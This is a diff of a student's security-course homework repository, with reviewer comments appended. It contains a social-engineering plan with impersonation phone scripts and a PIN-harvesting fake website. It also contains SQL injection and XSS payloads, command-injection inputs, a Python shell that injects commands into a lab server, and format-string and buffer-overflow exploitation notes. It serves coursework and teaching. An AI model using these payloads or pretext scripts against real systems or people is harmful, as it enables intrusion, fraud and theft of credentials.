diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000..b9328a7 Binary files /dev/null and b/.DS_Store differ diff --git a/hw3_writeup.md b/hw3_writeup.md new file mode 100644 index 0000000..8fe0697 --- /dev/null +++ b/hw3_writeup.md 
@@ -0,0 +1,15 @@ +Part 1 +Since some of these questions can be grouped together based on topic. Mother’s maiden name, city of birth, first pet all pertain to personal information about his mother, while browser and PIN number are more technical questions. With these groupings, I will try and impersonate three different fake employees. The first employee I will impersonate is a government consensus employee, calling about data that they lost regarding Eric’s mother. I will start the social engineering by saying his mother was not picking up my calls and I figured her son might be the next best bet. I will initiate this call from a business park building, probably in the lobby. Hopefully the background noise will make it seem like I am actually in a government office building or something like that. I won't dive into the information right away, but start by being very cordial, asking him about his day what he does for a living etc. to ease him into the conversation and make my voice somewhat familiar to him. I would disclose some information about myself, maybe even give accurate information about my city of residence and my personal relationships. Then I would start asking him to assist me fill in the blanks on this fake form: + +“My records show we’re missing information about your father’s middle name and... your mother’s maiden name. Could you provide me with both of those?”, I will ask about his father to try and split his attention so he is not sure who the target information is about. +“Thank you for your response! Now were your parents born in the same town? It says here that they were but I am not sure I can trust much of this information considering how much of it we’re missing [forced laugh]” HOPEFULLY Eric’s parents were born in different towns and he will respond with “no”. From there I would ask him to provide both of his parents' hometowns. + +The pet question is honestly very tricky. My gut reaction is to actually call his mother. 
Doing this would require me to obtain his mother’s personal phone number from him: “Thank you for your time Eric, I really appreciate it. I am going to try to call [Insert mother’s name here] again and verify this information with her... maybe I have the wrong number to reach her at. [Read off a fake number with the same area code that his mother is from] is this correct?” At this point I would assume he would correct me with the actual number. “Oh wow ok, way off. I’ll run this all by her right now, thanks again!” then end the call. I would take on another identity as an overly amiable petsmart employee and call his mother. “Good morning/evening Mrs Norman, this is Josiah from petsmart calling about a new initiative that petsmart is taking on! We are working with [local pound name] to sponsor and name some of their new furry friends! Now you do not have to pay money if you don't want to but we would like your suggestions for naming! I usually ask for about 3 names and I have a prompt here so it’s not too hard for you to come up with names on the spot! Your favorite flavor of ice cream, your very first pet's name, and your favorite fruit!” This prompt should distract her enough not to question the legitimacy of the entire situation and also give me the answer I am looking for. +My next and final identity I would take on is a GeekSquad employee who has been fake commissioned by Eric Norman to help improve his mother’s internet speed. (warning: this assumes his mother is technologically inept, please don't test run this prompt with a tech savvy mother). Using the phone number I received earlier from Eric, I would call his mother a few days, or even a week or two, later from a spoofed number: +“Your son had me call about your internet speeds, he told me that on his last visit (banking on Eric being a good son who visits his mother) he thought the wifi was quite slow. 
I won't take too much of your time, I would just like to test a few things over the phone” Ask her the typical questions, “is your router on?” “are you using a wireless connection or wired?” and the big one “what browser are you using?” +From there I would use a fake site that I developed, which looks like a GeekSquad official frontend connected to a backend that’s stood up on one of my numerous hacker VM’s i have set up in my house. What this website will do is take 3 inputs from the user and generate a randomly shuffled string with all 3 of the inputs and display it for the user. However, what it also does is store each of these 3 inputs, one of which will be her PIN. “Mrs Norman, for safety’s sake I believe we should probably reset your WiFi password, from what I am seeing it looks like someone might be leeching off your network and slowing it down.” I would then have her go to the website: “I am going to provide you with a website GeekSquad developed themselves which assists in coming up with very intricate and hard to crack passwords. Just fill out the 3 fields shown on the site and it will spit out a password for you” + +Part 2 +The first vulnerability I noticed was the strength of the user passwords. Websites like perspectiverisk.com, who do vulnerability scans on company and private networks, report that one of their most commonly found vulnerability’s are weak passwords. Perspectiverisk, along with many other security companies, suggest having an improved threshold for weak passwords. Instead of just a capital letter and a number with 8 characters, there should be more intricacies added in order to keep a standard across the board. Experts recommend using a passphrase, like a sentence commonly said around the house, as brute force attempts take exponentially longer time to crack when there are spaces involved. +The second vulnerability I picked up are the potential for SQL injections. 
Much of the network had no protection against SQL injections; one DROP TABLE could spell disaster for your network. ESecurity Planet and CMSC330 offer a few solutions for this, one of which is black listing or white listing phrases. Instead of permitting a user to enter anything at all, assume that every user can be malicious and take appropriate caution. Prevent certain statements or use input validation (mysql_real_escape_string()) in order to make sure a user cannot go beyond their permissions and see stuff they’re not supposed to. +The final vulnerability, and arguably the most critical, is OS command injection (see shell shock). An attacker is permitted to enter operating system commands, giving them access to the server itself and in turn wreaking havoc. The solution to these exploits is about the same as SQL injections, as they both take place on a server. One can whitelist commands, validate inputs to prevent certain entries from executing. However, portSwigger claims that one should “Never attempting to sanitize input by escaping shell metacharacters. In practice, this is just too error-prone and vulnerable to being bypassed by a skilled attacker.” diff --git a/hw3_writeup.txt b/hw3_writeup.txt new file mode 100644 index 0000000..8fe0697 --- /dev/null +++ b/hw3_writeup.txt 
@@ -0,0 +1,15 @@ +Part 1 +Since some of these questions can be grouped together based on topic. Mother’s maiden name, city of birth, first pet all pertain to personal information about his mother, while browser and PIN number are more technical questions. With these groupings, I will try and impersonate three different fake employees. The first employee I will impersonate is a government consensus employee, calling about data that they lost regarding Eric’s mother. I will start the social engineering by saying his mother was not picking up my calls and I figured her son might be the next best bet. I will initiate this call from a business park building, probably in the lobby. Hopefully the background noise will make it seem like I am actually in a government office building or something like that. I won't dive into the information right away, but start by being very cordial, asking him about his day what he does for a living etc. to ease him into the conversation and make my voice somewhat familiar to him. I would disclose some information about myself, maybe even give accurate information about my city of residence and my personal relationships. Then I would start asking him to assist me fill in the blanks on this fake form: + +“My records show we’re missing information about your father’s middle name and... your mother’s maiden name. Could you provide me with both of those?”, I will ask about his father to try and split his attention so he is not sure who the target information is about. +“Thank you for your response! Now were your parents born in the same town? It says here that they were but I am not sure I can trust much of this information considering how much of it we’re missing [forced laugh]” HOPEFULLY Eric’s parents were born in different towns and he will respond with “no”. From there I would ask him to provide both of his parents' hometowns. + +The pet question is honestly very tricky. My gut reaction is to actually call his mother. 
Doing this would require me to obtain his mother’s personal phone number from him: “Thank you for your time Eric, I really appreciate it. I am going to try to call [Insert mother’s name here] again and verify this information with her... maybe I have the wrong number to reach her at. [Read off a fake number with the same area code that his mother is from] is this correct?” At this point I would assume he would correct me with the actual number. “Oh wow ok, way off. I’ll run this all by her right now, thanks again!” then end the call. I would take on another identity as an overly amiable petsmart employee and call his mother. “Good morning/evening Mrs Norman, this is Josiah from petsmart calling about a new initiative that petsmart is taking on! We are working with [local pound name] to sponsor and name some of their new furry friends! Now you do not have to pay money if you don't want to but we would like your suggestions for naming! I usually ask for about 3 names and I have a prompt here so it’s not too hard for you to come up with names on the spot! Your favorite flavor of ice cream, your very first pet's name, and your favorite fruit!” This prompt should distract her enough not to question the legitimacy of the entire situation and also give me the answer I am looking for. +My next and final identity I would take on is a GeekSquad employee who has been fake commissioned by Eric Norman to help improve his mother’s internet speed. (warning: this assumes his mother is technologically inept, please don't test run this prompt with a tech savvy mother). Using the phone number I received earlier from Eric, I would call his mother a few days, or even a week or two, later from a spoofed number: +“Your son had me call about your internet speeds, he told me that on his last visit (banking on Eric being a good son who visits his mother) he thought the wifi was quite slow. 
I won't take too much of your time, I would just like to test a few things over the phone” Ask her the typical questions, “is your router on?” “are you using a wireless connection or wired?” and the big one “what browser are you using?” +From there I would use a fake site that I developed, which looks like a GeekSquad official frontend connected to a backend that’s stood up on one of my numerous hacker VM’s i have set up in my house. What this website will do is take 3 inputs from the user and generate a randomly shuffled string with all 3 of the inputs and display it for the user. However, what it also does is store each of these 3 inputs, one of which will be her PIN. “Mrs Norman, for safety’s sake I believe we should probably reset your WiFi password, from what I am seeing it looks like someone might be leeching off your network and slowing it down.” I would then have her go to the website: “I am going to provide you with a website GeekSquad developed themselves which assists in coming up with very intricate and hard to crack passwords. Just fill out the 3 fields shown on the site and it will spit out a password for you” + +Part 2 +The first vulnerability I noticed was the strength of the user passwords. Websites like perspectiverisk.com, who do vulnerability scans on company and private networks, report that one of their most commonly found vulnerability’s are weak passwords. Perspectiverisk, along with many other security companies, suggest having an improved threshold for weak passwords. Instead of just a capital letter and a number with 8 characters, there should be more intricacies added in order to keep a standard across the board. Experts recommend using a passphrase, like a sentence commonly said around the house, as brute force attempts take exponentially longer time to crack when there are spaces involved. +The second vulnerability I picked up are the potential for SQL injections. 
Much of the network had no protection against SQL injections; one DROP TABLE could spell disaster for your network. ESecurity Planet and CMSC330 offer a few solutions for this, one of which is black listing or white listing phrases. Instead of permitting a user to enter anything at all, assume that every user can be malicious and take appropriate caution. Prevent certain statements or use input validation (mysql_real_escape_string()) in order to make sure a user cannot go beyond their permissions and see stuff they’re not supposed to. +The final vulnerability, and arguably the most critical, is OS command injection (see shell shock). An attacker is permitted to enter operating system commands, giving them access to the server itself and in turn wreaking havoc. The solution to these exploits is about the same as SQL injections, as they both take place on a server. One can whitelist commands, validate inputs to prevent certain entries from executing. However, portSwigger claims that one should “Never attempting to sanitize input by escaping shell metacharacters. In practice, this is just too error-prone and vulnerable to being bypassed by a skilled attacker.” diff --git a/week/.DS_Store b/week/.DS_Store new file mode 100644 index 0000000..597c17f Binary files /dev/null and b/week/.DS_Store differ diff --git a/week/1/writeup/README.md b/week/1/writeup/README.md index f1f8619..7436022 100644 --- a/week/1/writeup/README.md +++ b/week/1/writeup/README.md 
@@ -1,18 +1,25 @@ # Writeup 1 - Ethics -Name: *PUT YOUR NAME HERE* -Section: *PUT YOUR SECTION NUMBER HERE* +Name: Josiah Rapp +Section: 0201 I pledge on my honor that I have not given or received any unauthorized assistance on this assignment or examniation. -Digital acknowledgement: *PUT YOUR NAME HERE* +Digital acknowledgement: Josiah Rapp ## Assignment Writeup ### Part 1 (25 pts) -This was done via the ELMS assignment. +This was done via the [ELMS assignment](). (we'll post an announcement when this is ready!) ### Part 2 (75 pts) -*Replace this text with your repsonse to our prompt and your ethical argument!* +My first course of action would be to inform my supervisor or boss, whoever the head of the department is. It is crucial that we keep this information internal while we discuss solutions and attempt to +address the problem. Hopefully the company I am working for cares about its' consumers, however if they do not, I would attempt to patch the exploits myself. I would only notify the public of the +security issues if my company does not delay the release or postpone it all together. I am assuming that this would get me fired from my position as ECU auditor as exposing internal information is quite +the no-no, i might even face legal consequences for doing this. Ethically speaking, I believe my employers would be more guilty than I in this situation. If they choose to ignore my warnings they are +potentially risking the lives of all their customers. The ECU is an extremely important part of the car; comparable to the 'brain' of the vehicle. + +If I were to do nothing, I would surely be held responsible for any damage, injury, or death caused by these vulnerable ECU's. My job is to audit, and if I do not do my job properly then I deserve to be +held accountable. This is quite the tragic situation, I am sure there have been many internal whistleblowers who have lost their jobs or faced legal prosecution for something like this. 
diff --git a/week/11/.DS_Store b/week/11/.DS_Store new file mode 100644 index 0000000..b4ba30a Binary files /dev/null and b/week/11/.DS_Store differ diff --git a/week/11/writeup/README.md b/week/11/writeup/README.md index e5690da..4b3f3a0 100644 --- a/week/11/writeup/README.md +++ b/week/11/writeup/README.md @@ -1,11 +1,11 @@ # Writeup 1 - Web I -Name: *PUT YOUR NAME HERE* -Section: *PUT YOUR SECTION NUMBER HERE* +Name: Josiah Rapp +Section: 0101 I pledge on my honor that I have not given or received any unauthorized assistance on this assignment or examination. -Digital acknowledgement: *PUT YOUR NAME HERE* +Digital acknowledgement: Josiah Rapp ## Assignment details 
@@ -19,12 +19,29 @@ Such a Quick Little, website! [http://142.93.136.81:5000/](http://142.93.136.81:5000/) +Ironically i found this one the hardest of the two because I was overthinking. I first tried some local and remote file inclusion using a php web shell, and that did not work in the slightest. I then reread the description and got the hint yall were giving and then changed my approach to a SQL injection instead. I tried the injection from the lecture slides, however that did not work... stumped I made a piazza post. The answer to that helped steer me in the correct direction, and entered a SQL snippet that would always return true to trick the database into dumping it's contents. + +that snippet was admin' || '1'='1'-- - and the flag is CMSC389R-{y0u_ar3_th3_SQ1_ninj@} + ### Part 2 (60 Pts) Complete all 6 levels of: [https://xss-game.appspot.com](https://xss-game.appspot.com) -Produce a writeup. We will not take off points for viewing the source code and/or viewing hints, but we strongly discourage reading online write-ups as that defeats the purpose of the homework. +The first one level was fairly simple; insert a + +From here on out I used the hints provided by the website: + +The second level mentioned looking at the img tag and the onerror attribute. After a lot of trial and error I discovered that if there is an error thrown, it will execute the onerror attribute. So the next logical step was to do onerror=“javascript:alert(“test”)” and that worked. + +The third level required some research on escaping quotes in the URL, which would be applicable to level 4 as well. The solution was to escape the specific image url with ‘’ and insert another onerror=alert(“test”) into the URL, that way when it loaded up, it detects an error and calls our function. The url looked like this: https://xss-game.appspot.com/level3/frame#3'onerror='alert("test")' + +Level four requires character escaping as well, but this time it’s a little more convoluted. 
The hints told me to enter a single quote and note the error console, which read: Uncaught SyntaxError: missing ) after argument list. The second hint mentions HTML encoding, so I looked up the value for semi-colon, which was %3B. I tried using this encoding to display the alert like so: https://xss-game.appspot.com/level4/frame?timer=)%3Balert(1)%3B however that only resulted in the message “Your timer will executed in );alert(1); seconds.” Which…. Is not desirable. I tested that URL with ‘startTimer(‘’); appended on to the end as well, but that did not work. I tried a dummy statement that would wrap around to the ‘) at the front: var v = (‘ in order to mask the alert in the middle and that worked. + +The hints, specifically the 3rd one, helped a lot. Reading the source code, we learn that the page redirects based on what is after the next= in the URL. If one had already loaded up the signup page, next is already being looked at/might be populated, so in order to override this you must immediately load a URL with your payload set, as opposed to entering it once the Dom renders. Navigating to https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert("test") THEN entering an email and clicking next will jump to the alert instead. + +The final level is a remote file hosting, which we discussed in class. Messing around on the website, I deduced that after the frame# section of the URL, the website reads in a file location. Great, now we can begin the actual exploitation. First I made a pastebin post that hosted alert(“test”), converted it to raw, then pasted the link after the #. This did not work, so I had to examine the source code. Turns out it excludes anything with https in it, however ONLY https because they did not take cMSC330 and did not make an exhaustive regex meaning their safeguard is not case sensitive. 
Changed the casing of the pastebin link and it worked: https://xss-game.appspot.com/level6/frame#httPs://pastebin.com/raw/LBVsTuce ### Format diff --git a/week/4/.DS_Store b/week/4/.DS_Store new file mode 100644 index 0000000..a9012e0 Binary files /dev/null and b/week/4/.DS_Store differ diff --git a/week/4/stub.py b/week/4/stub.py index 939d5ed..90e1e17 100644 --- a/week/4/stub.py +++ b/week/4/stub.py @@ -8,11 +8,18 @@ """ import socket +import subprocess host = "wattsamp.net" # IP address here port = 1337 # Port here def execute_cmd(cmd): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + data = s.recv(1024) + s.send("1;"+cmd+"\n") + data = s.recv(1024) + print(data) """ Sockets: https://docs.python.org/3/library/socket.html How to use the socket s: @@ -30,8 +37,16 @@ def execute_cmd(cmd): s.send("something to send\n") # Send a newline \n at the end of your command """ - print("IMPLEMENT ME") - -if __name__ == '__main__': - print("IMPLEMENT ME") +def main(): + while True: + command = raw_input("> ") + if (command == "exit" or command == "quit"): + break + elif command == "help": + print("Show this help menu") + else: + execute_cmd(command) + +if '__main__' == __name__: + main() diff --git a/week/4/writeup/README.md b/week/4/writeup/README.md index 660d427..42bd86a 100644 --- a/week/4/writeup/README.md +++ b/week/4/writeup/README.md 
@@ -1,18 +1,45 @@ # Writeup 2 - Pentesting -Name: *PUT YOUR NAME HERE* -Section: *PUT YOUR SECTION NUMBER HERE* +Name: Josiah Rapp +Section: 0101 I pledge on my honor that I have not given or received any unauthorized assistance on this assignment or examination. -Digital acknowledgement: *PUT YOUR NAME HERE* +Digital acknowledgement: Josiah Rapp ## Assignment Writeup ### Part 1 (45 pts) -*Please use this space to writeup your answers and solutions (and how you found them!) for part 1.* +I found two flags: +-CMSC389R-{html_h@x0r_lulz} +-CMSC389R-{p1ng_as_a_$erv1c3} + +The first flag I obtained snooping around the HTML code of the wattsamp website. It was hidden on the home page near the end of the body element. + +The second flag I found was a little more tricky. I started my search by using the command provided 'nc wattsamp 1337' in my home terminal. I was then prompted by the server to enter an IP address to ping. I did that and obtained nothing but some ping data. I then remembered some of what we learned in lecture and also in CMSC330 about command injection. These are the commands I entered: + +-'1' (i realized the field required some form of number to actually process the input) + ';ls' + I was able to successfully list all the libraries of the wattsamp server by concatenating a command after a semi-colon + +-'1;ls -alh' + I added a '-alh' after the l's' in order to see permissions of the file. However, this had an unintended side effect: it displayed the last time those folders/files were editted. The home directory had the date of september 24th (last tuesday) and was the most recently updated file besides the ones that popped up with today's date. + +-'1;cd home' + I cd'd into the directory but I could not list the contents. I could not figure out how to enter multiple commands, as the shell boots you after either 3 seconds or after you enter anything at all. 
But through some trial and error I was able to successfully figure out that you can enter a new command after each semi-colon. + +-'1;cd home;ls' + enter the home directory then finally list the contents, which in turn displayed the flag + +-'1;cd home;cat flag.txt' + the final command i entered in order to display the requested flag. + +I think Edward should really try and sanitize or whitelist his inputs. Kind of how the admin tab on the wattsamp website makes sure you have no funky or suspicious characters after the @ in the email field. This prevents any user from entering malicious code at the end of a seemingly valid input. Or you know, make a whitelist of users that can connect to his server. ### Part 2 (55 pts) -*Please use this space to detail your approach and solutions for part 2. Don't forget to upload your completed source code to this /writeup directory as well!* +I wrote a script using python in order to run command injection on the wattsamp server. We had a 216 project that required us to write a shell similar to this one, except in python the syntax is much better, I referenced that a lot while I was writing. This is my second time having to write in python so i was quite confused, but found the language to be quite convenient. + +My shell takes the users input and appends a '1;' to the front of it. This is to initiate the commabnd injection, as the wattsamp server reads the number, pings it, then takes the rest of the input as a command. After the semi colon I inject the command passed into the shell so that the server will execute the command. I then concatenate a new line character at the end of the users input to complete the input. + +I could not figure out how to go about download, as you can tell by my code. I overheard some other students talking about utilizing the 'cat' function in order to basically make a copy of the requested file and put it in the local path that is passed in. 
However, when i attempted to implement this, I could not quite figure out how to properly pass the users requested file locations into the payload. diff --git a/week/6/.DS_Store b/week/6/.DS_Store new file mode 100644 index 0000000..34821fc Binary files /dev/null and b/week/6/.DS_Store differ diff --git a/week/6/writeup/README.md b/week/6/writeup/README.md index 335d2f2..81db8f2 100644 --- a/week/6/writeup/README.md +++ b/week/6/writeup/README.md 
@@ -1,19 +1,18 @@ # Writeup 6 - Binaries I -Name: *PUT YOUR NAME HERE* -Section: *PUT YOUR SECTION NUMBER HERE* +Name: Josiah Rapp +Section: 0101 I pledge on my honor that I have not given or received any unauthorized assistance on this assignment or examination. -Digital acknowledgement: *PUT YOUR NAME HERE* +Digital acknowledgement: Josiah Rapp ## Assignment Writeup ### Part 1 (50 pts) -*Please use this space to provide flag from program* +CMSC389R-{di5a55_0r_d13} ### Part 2 (50 pts) -*Please use this space to detail your approach and solutions for part 2. Include -descriptions of checks implemented as well as your final input to produce flag.* +There were 3 checks I had to clear in order to obtain this flag. I started this process by running './crackme' to get my bearings. Nothing happened as expected and i proceeded to run binary ninja on the c file. I decided to start with the main method at the direction of one of the professors, and followed the comparison branches labled 'cmp'. From my limited 216 and 411 knowledge I was able to deduce that there were some string comparisons taking place within the last line of the main method. On an incorrect comparison, it would branch right, and a correct comparison would branch left. Obviously I wanted a correct answer so i proceeded left. Reading this block helped me understand some of what the code did: it was a lot of shifting around of registers and pointer arithmetic to pass certain variables around, but most importantly, calling a function called 'update_flag'. check1 seems to do a strcmp between some register and "Oh God". I ran './crackme "Oh God"' successfully which cleared the first check and updated the flag, which was stored in a register. Check2 required a little more thinking; i noticed there was a getenv call, but couldnt figure out why or what it did. 
Research led me to learn about environments as a whole and understand that the assembly was trying to retrieve the value of a certain environment named FOOBAR. i ran the command 'export FOOBAR = ""' (which makes a new environment) and ran './crackme' again. It did not pass the check as the value it was comparing too was incorrect, so i tried 'export FOOBAR="seye ym "'. This also did not work, i analyzed the add and comparison statements and realized that the desired string shown after the check2 call was backwards, resulting in 'export FOOBAR=" my eyes"' and cleared the check/updated the flag. check3 ran open, which opens a file named 'sesame' and reads it byte by byte, specifically with a switch statement analyzing each character of a string and comparing it to a hex value. I converted said hex value into ASCII to reveal it was equality checking " they burn". I entered 'nano sesame' into the command line, entered " they burn" into the file and saved it. I then ran './crackme "Oh God"' one last time that revealed the flag above. diff --git a/week/7/.DS_Store b/week/7/.DS_Store new file mode 100644 index 0000000..2d19d45 Binary files /dev/null and b/week/7/.DS_Store differ diff --git a/week/7/writeup/README.md b/week/7/writeup/README.md index 1f14e25..687410c 100644 --- a/week/7/writeup/README.md +++ b/week/7/writeup/README.md 
@@ -1,27 +1,27 @@ # Writeup 7 - Forensics I -Name: *PUT YOUR NAME HERE* -Section: *PUT YOUR SECTION NUMBER HERE* +Name: Josiah Rapp +Section: 0101 I pledge on my honor that I have not given or received any unauthorized assistance on this assignment or examination. -Digital acknowledgement: *PUT YOUR NAME HERE* +Digital acknowledgement: Josiah Rapp ## Assignment Writeup ### Part 1 (100 pts) Answer the following questions regarding [this](../image) file: -1. What kind of file is it? +1. JPEG -2. Where was this photo taken? Provide a city, state and the name of the building in your answer. +2. Chicago, Illinois, John Hancock Center -3. When was this photo taken? Provide a timestamp in your answer. +3. 2018:08:22 11:33:24 -4. What kind of camera took this photo? +4. iPhone 8 back camera 3.99mm f/1.8 -5. How high up was this photo taken? Provide an answer in meters. +5. 539.5 m Above Sea Level -6. Provide any found flags in this file in standard flag format. +6. CMSC389R--{look_I_f0und_a_str1ng} *Please use this space to provide flag from program* diff --git a/week/8/.DS_Store b/week/8/.DS_Store new file mode 100644 index 0000000..65acd41 Binary files /dev/null and b/week/8/.DS_Store differ diff --git a/week/8/server.c b/week/8/server.c index f00e9a6..ad26a82 100644 --- a/week/8/server.c +++ b/week/8/server.c @@ -93,6 +93,7 @@ int main(void) { password[i] = rand() % ('z'-' ') + ' '; } password[PASS_SIZE] = 0; + printf(password); while ((prompt_response = main_prompt()) != 0) { if (prompt_response == 1 || prompt_response == 2) { diff --git a/week/8/writeup/README.md b/week/8/writeup/README.md index 0ec34f5..2db74e7 100644 --- a/week/8/writeup/README.md +++ b/week/8/writeup/README.md 
@@ -1,11 +1,11 @@ # Writeup 8 - Binaries II -Name: *PUT YOUR NAME HERE* -Section: *PUT YOUR SECTION NUMBER HERE* +Name: Josiah Rapp +Section: 0101 I pledge on my honor that I have not given or received any unauthorized assistance on this assignment or examination. -Digital acknowledgement: *PUT YOUR NAME HERE* +Digital acknowledgement: Josiah Rapp ## Assignment Writeup 
@@ -14,8 +14,20 @@ Answer the following questions regarding the server executable (for which source 1. How is the per-session administrator password generated? Are there any inherent weaknesses in this implementation? + The passwords are generated with a two step process. The first step is to seed a RNG using the current time. The second step loops through an array size 16 (also the size allocated to the password) and uses the return value (random ascii values in hex) of the previously mentioned RNG and modding it with ('z' - ' '). replicable and not the most intense password generation. Fabricating the computers time stamp is an easy way of taking advantage of the vulnerability. + 2. Describe two vulnerabilities in this program. Provide specific line numbers and classifications of the vulnerability. Explain potential ramifications as well as ways to avoid these vulnerabilities when writing code. + The printf(output) on line 46 is a good example of a format string vulnerability. If there was a malicious attacker, they could input a bunch of stack calls (%p) into the input string (which is used to generate the output string that is later printed) printing memory addresses of the stack out into the console which can then be utilized by the attacker. Can be easily avoided by specifying %s (type string) as the format string. + + The second vulnerability is located at line 68, on the gets(buff) statement. This is a potential buffer overflow exploit waiting to happen, and can be prevented by changing gets to fgets. + 3. What is the flag? + CMSC389R-{expl017-2-w1n} + 4. Describe the process you followed to obtain the flag: vulnerabilities exploited, your inputs to the server in a human-readable format, etc. If you create any helper code please include it. + + I started by connecting to the server at 'nc ec2-18-222-89-163.us-east-2.compute.amazonaws.com' using port 22 (recalling from lecture that port 22 is the most common). 
After combing through the lecture slides, I began to parse through the binary file using GDB. I initially tried to print the password to no avail, but inserting a breakpoint where the password was declared gave me more insight. It provided me with the string '%29$f', i tried entering that into the encrypt field, entering that into the authentication stage which did not work. I then did the reverse, decrypted the string and entered that into authentication and that gave me elevated access. I then proceeded to do what most good computer science students do and spam the command line with commands i knew off top. Ls displayed a flag file, however i could not open it, so back to the server.c file i went. I purused the exec_command method since that's what i wanted, to execute a command. There was a buffer that was 32 bits long , so i attempted to enter my "cat flag" command with 25 other characters in order to trigger a buffer overflow. this worked, and the flag stated above was printed out. + + note: all of my commands were doubled "ls" was "ls ls" and "cat flag" was "cat flag cat flag"
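Review bot: the binary `.DS_Store` files added at the repo root and under `week/`, `week/11`, `week/4`, `week/6`, `week/7` and `week/8` are macOS Finder metadata and do not belong in the repository; add `.DS_Store` to `.gitignore` and drop them from the commit with `git rm --cached`.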
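Review bot: in the Part 2 SQL injection paragraph of `hw3_writeup.md`, `mysql_real_escape_string()` is described as "input validation", but it is an escaping function (and the `mysql_*` extension it belongs to was removed in PHP 7); the standard mitigation is parameterized queries / prepared statements, with an allow-list only for the few values that cannot be bound as parameters (table or column names). The passphrase sentence in the same hunk would be more precise as: brute-force cost grows with length and alphabet size, not with the presence of spaces as such. Since the file is Markdown, `Part 1` and `Part 2` should be headings (`## Part 1`) rather than bare lines.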
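Review bot: `hw3_writeup.txt` has the same blob as `hw3_writeup.md` (both `index 0000000..8fe0697`), so this commit adds the identical writeup twice; keep one copy (the `.md`, matching the other writeups) and delete the other.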
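Review bot: in `week/1/writeup/README.md` the `Section:` line says `0201` while every other writeup in this commit says `0101`; confirm which is correct. The `[ELMS assignment]()` link in the same hunk has an empty target and renders as dead text.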
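Review bot: in the second hunk of `week/11/writeup/README.md`, the level 1 sentence stops after "insert a" (the markup was most likely swallowed by Markdown rendering); wrap payloads such as the `admin' || '1'='1'-- -` snippet in backticks so they survive rendering. The level 6 paragraph is worth closing with the defensive lesson it already implies: the filter failed because it was a case-sensitive deny-list on the scheme string, and an allow-list of permitted origins checked against the parsed, lower-cased URL is the robust fix, just as the Part 1 `'1'='1'` bypass is what parameterized queries remove.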
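Review bot: in the first `week/4/stub.py` hunk, `import subprocess` is never used, and `execute_cmd` opens a socket it never closes; call `s.close()` in a `finally:` block (or use the context-manager form under Python 3) and drop the unused import. `s.send("1;"+cmd+"\n")` passes a `str`, which the Python 3 socket API the docstring links to rejects (`bytes` are required), so as written the file only runs under Python 2.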
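Review bot: in the second `week/4/stub.py` hunk, `raw_input` exists only in Python 2 while the docstring cites the Python 3 socket docs; pick one interpreter version (`input()` under Python 3, with the string encoded before sending). The `help` branch prints the literal text `Show this help menu` rather than listing the supported commands (`exit`, `quit`, `help`), and the parentheses around the `command == "exit" or ...` condition are unnecessary.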
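Review bot: the remediation paragraph in `week/4/writeup/README.md` ("sanitize or whitelist his inputs") could be made concrete: the server accepts an IP address to ping, so the fix is to validate the input as an IP address (e.g. `inet_pton` in C or the `ipaddress` module in Python) and invoke `ping` without a shell (an argv list, not a concatenated command string), which removes the `;` separator problem instead of filtering for it. Also, "list all the libraries of the wattsamp server" describes `ls` output, which lists directory entries, not libraries.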
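Review bot: in `week/6/writeup/README.md`, `export FOOBAR = ""` does not set anything: with spaces around `=`, the shell sees `FOOBAR`, `=` and `""` as separate arguments and bash rejects `=` as an invalid identifier; only the later `export FOOBAR=" my eyes"` form actually assigns. "environment named FOOBAR" should read "environment variable named FOOBAR".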
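Review bot: in `week/7/writeup/README.md` answer 6, the flag is written `CMSC389R--{...}` with a double hyphen, unlike the `CMSC389R-{...}` format in every other writeup here; confirm it is not a typo. The template line `*Please use this space to provide flag from program*` is still present below the answers and should be removed.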
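Review bot: the added `printf(password);` in `week/8/server.c` has no format string, so the password buffer itself is interpreted as the format; since each `password[i]` is drawn from the range `' '`..`'z'`, it can contain `%`, making this the same format-string bug the accompanying writeup flags at line 46. If a debug print is needed, use `printf("%s\n", password);` and keep it out of the committed build, because it echoes the per-session administrator password to stdout.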
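Review bot: in the answer hunk of `week/8/writeup/README.md`, "a buffer that was 32 bits long" is presumably 32 bytes (`gets(buff)` fills a char array, and 8 + 25 characters only overflows a 32-byte buffer), and "port 22 is the most common" is inaccurate: 22 is SSH's well-known port, and the `nc` command as quoted has no port argument at all. Question 1 would be stronger with the fix: seed from `getrandom(2)` or `/dev/urandom` rather than the current time, or better, draw the password bytes from such a source directly, since `rand()` is not a cryptographic generator regardless of seed. For question 2, the bounded replacement is `fgets(buff, sizeof buff, stdin)`; `fgets` only helps when its size argument matches the buffer.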